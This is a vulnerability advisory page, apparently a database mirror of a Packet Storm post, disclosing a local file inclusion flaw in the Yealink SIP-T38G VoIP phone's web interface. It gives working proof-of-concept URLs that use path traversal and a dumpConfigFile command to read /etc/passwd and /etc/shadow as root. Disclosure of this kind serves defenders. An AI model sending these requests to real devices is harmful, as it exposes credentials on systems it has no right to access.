Lucene search
Mr.Un1k0d3rPACKETSTORM:127095HistoryJun 13, 2014 - 12:00 a.m.
Yealink VoIP Phone SIP-T38G Local File Inclusion
2014-06-1300:00:00
Mr.Un1k0d3r
packetstormsecurity.com
21
0.004 Low
EPSS
Percentile
73.5%
`Title: Yealink VoIP Phone SIP-T38G Local File Inclusion
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5756, CVE-2013-5757
Description:
Web interface contain a vulnerability that allow any page to be included.
We are able to disclose /etc/passwd & /etc/shadow
POC:
Using the page parameter (CVE-2013-5756):
http://
[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://
[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
Using the command parameter (CVE-2013-5757):
http://[host]/cgi-bin/cgiServer.exx?command=dumpConfigFile("/etc/shadow")
*By viewing the shadow file we are able to conclude that cgiServer.exx run
under the root privileges. This lead to CVE-2013-5759.
`
Related
exploitpack
exploitpack
Yealink VoIP Phone SIP-T38G - Local File Inclusion
2014-06-13 00:00:00
Yealink VoIP Phone SIP-T38G - Privilege Escalation
2014-06-13 00:00:00
seebug
seebug
Yealink VoIP Phone SIP-T38G - Local File Inclusion
2014-07-01 00:00:00
Yealink VoIP Phone SIP-T38G - Privileges Escalation
2014-07-01 00:00:00
exploitdb
exploitdb
Yealink VoIP Phone SIP-T38G - Local File Inclusion
2014-06-13 00:00:00
Yealink VoIP Phone SIP-T38G - Privilege Escalation
2014-06-13 00:00:00
openvas
openvas
Yealink VoIP Phone SIP-T38G Multiple Vulnerabilities
2014-06-20 00:00:00
zdt
zdt
Yealink VoIP Phone SIP-T38G - Multiple Vulnerabilities
2014-06-14 00:00:00
cve
cve
nvd
nvd
cvelist
cvelist
prion
prion
Directory traversal
2014-08-03 18:55:00
Path traversal
2014-08-03 18:55:00
Design/Logic Flaw
2014-08-03 18:55:00
packetstorm
packetstorm
Yealink VoIP Phone SIP-T38G Privilege Escalation
2014-06-13 00:00:00